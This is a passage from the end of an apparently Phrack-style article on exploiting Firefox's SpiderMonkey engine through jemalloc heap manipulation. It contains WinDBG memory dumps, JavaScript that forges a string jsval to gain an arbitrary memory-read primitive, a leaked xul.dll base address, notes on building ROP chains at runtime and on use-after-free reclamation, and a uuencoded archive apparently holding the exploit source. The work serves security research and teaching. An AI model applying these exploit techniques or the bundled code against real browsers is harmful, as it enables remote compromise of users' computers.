    15f16020  00000000 00000000 15f16000 00000000
    15f16030  00000007 00000000 00090000 00000000
    15f16040  69e0d1f4 00000000 00000000 00000000
    15f16050  00000000 00000000 69e0bd38 00000000
    15f16060  69f680d4 e5e50000 69f680d4 e5e50000
    15f16070  69f680d4 e5e50100 00000000 e5e5e5e5
    15f16080  69e0c9d8 69e0c24c 00000000 00000000
    15f16090  00000000 00000000 00000000 00000000
    15f160a0  00000000 e5e5e5e5 00000000 00000000
    15f160b0  00890001 e5000000 00000000 e5e5e5e5
    15f160c0  00000000 00000000 e4000001 00000000
    15f160d0  00000000 e4010101 00000000 00000000
    15f160e0  e4000201 00000000 00000000 e4010301
    15f160f0  06000106 00000001 00000000 e5e50000

    [ The contents of our Uint32Array ]
              [ string jsval  ]
    15f16100  15f16110 ffffff85 51575751 51575751

              [ fake non-inline string          ]
                       [ size ] [ addr ]
    15f16110  00000049 00000002 67c30000 00000000

    15f16120  51575751 51575751 51575751 51575751
    15f16130  51575751 51575751 51575751 51575751

The output in WinDBG is:

    [*] corrupted array found at index: 25649
    [*] leaked xul.dll base address: 0x67c30000
    [*] victim SVGImageElement object is at: 0x15f16000
    [*] leaked: MZ

Since we used the address of the base of xul.dll (we previously leakd) as
the arbitrary address to leak from, we get back "MZ" as we expected. At
this point it should be clear why it doesn't matter if the heap
arrangement didn't succeed in some jemalloc runs. We can keep trying to
leak via our fake string jsvals that we placed in the beginning of all
sprayed Uint32Arrays. We will only get back the expected "MZ" value from a
jsval on a run that the heap arrangement succeeded. On runs that the
arrangement didn't work (that is the Uint32Array is before the
SVGImageElement object), trying to access index 62 (where we expect our
fake string jsval to be) would simply return a double due to the two
dwords there being interpreted as an IEEE-754 jsval without a tag. This
doesn't attempt to do dereference anything, therefore no crash can happen.

When we finally get back the "MZ" value, we can re-use our fake string
jsval to leak from whatever address we want.

    // now we can re-use the fake string-type jsval
    // to leak from another location
    read_addr = "cafebabe"; // crash to demonstrate
    write_val_bytes = hex_to_bytes("00000000" + read_addr);
    write_val_double = bytes_to_double(write_val_bytes);
    container[pwned_index][65] = write_val_double;

    leaked = "[*] leaked: " + container[pwned_index][62];
    log(leaked);

Our Uint32Array now looks like:

    [ The contents of our Uint32Array ]
              [ string jsval  ]
    15f16100  15f16110 ffffff85 51575751 51575751

              [ fake non-inline string          ] 
                       [ size ] [ addr ]
    15f16110  00000049 00000002 cafebabe 00000000

    15f16120  51575751 51575751 51575751 51575751
    15f16130  51575751 51575751 51575751 51575751

Trying to read from address cafebabe leads of course to a crash (just to
demonstrate):

    0:000> g
    (858.f68): Access violation - code c0000005 (first chance)

    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.

    eax=cafebac0 ebx=00000000 ecx=133bb7f4 edx=00000000 esi=00000002
    edi=133bb7e0 eip=67df0192 esp=003ad120 ebp=cafebabe
    iopl=0         nv up ei pl nz na po nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b  efl=00010202

    xul!js::ConcatStrings<0>+0x178:
    67df0192 mov     al,byte ptr [ebp]             ss:002b:cafebabe=??

We finally have a re-usable arbitrary leak primitive and we also know the
base of xul.dll. We can dynamically search for ROP gadgets and construct
our ROP chain at exploit runtime in JavaScript.

----[ 5.6 - Use-after-free bugs

Exploiting use-after-free bugs with the presented methodology is a matter
of reclaiming the jemalloc region left by the freed object with a typed
array (Uint32Array). Then we use the fake object's methods to overwrite the
metadata of a neighboring sprayed ArrayObject, and we apply the given
methodology.

--[ 6 - Conclusion

Greetz and thankz to the Phrack Staff for bugging me to write this and for
their very helpful review ;) The Immunity team during my dry run for
Infiltrate also provided insightful comments.

Finally, bro sups to huku, nemo, the CENSUS crew and all the !fapperz.

--[ 7 - References

[INF] OR'LYEH? The Shadow over Firefox -
      http://web.archive.org/web/20150403070544/http://infiltratecon.com/
      speakers.html#firefox
[JSV] JS::Value -
      https://developer.mozilla.org/en-US/docs/Mozilla/Projects/
      SpiderMonkey/JSAPI_Reference/JS::Value
[IFP] IEEE Standard for Floating-Point Arithmetic (IEEE-754) -
      http://en.wikipedia.org/wiki/IEEE_floating_point
[JSO] JSObject -
      https://developer.mozilla.org/en-US/docs/Mozilla/Projects/
      SpiderMonkey/JSAPI_reference/JSObject
[P2O] Advanced Exploitation of Mozilla Firefox Use-After-Free
      Vulnerability (Pwn2Own 2014) -
      http://www.vupen.com/blog/
      20140520.Advanced_Exploitation_Firefox_UaF_Pwn2Own_2014.php
[REN] XSS and Beyond -
      https://www.owasp.org/images/c/c3/20140617-XSS_and_beyond-Rene.pdf
[F32] Firefox Release 32.0 -
      https://www.mozilla.org/en-US/firefox/32.0/releasenotes/
[JSR] JSAPI User Guide -
      https://developer.mozilla.org/en-US/docs/Mozilla/Projects/
      SpiderMonkey/JSAPI_User_Guide
[PSJ] Pseudomonarchia jemallocum -
      http://www.phrack.org/issues/68/10.html
[UNJ] unmask_jemalloc -
      https://github.com/argp/unmask_jemalloc
[SHD] shadow -
      https://github.com/CENSUS/shadow
[FSJ] Heap Feng Shui in JavaScript -
      http://www.phreedom.org/research/heap-feng-shui/heap-feng-shui.html

--[ 8 - Source code

begin 664 code.tar.gz
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
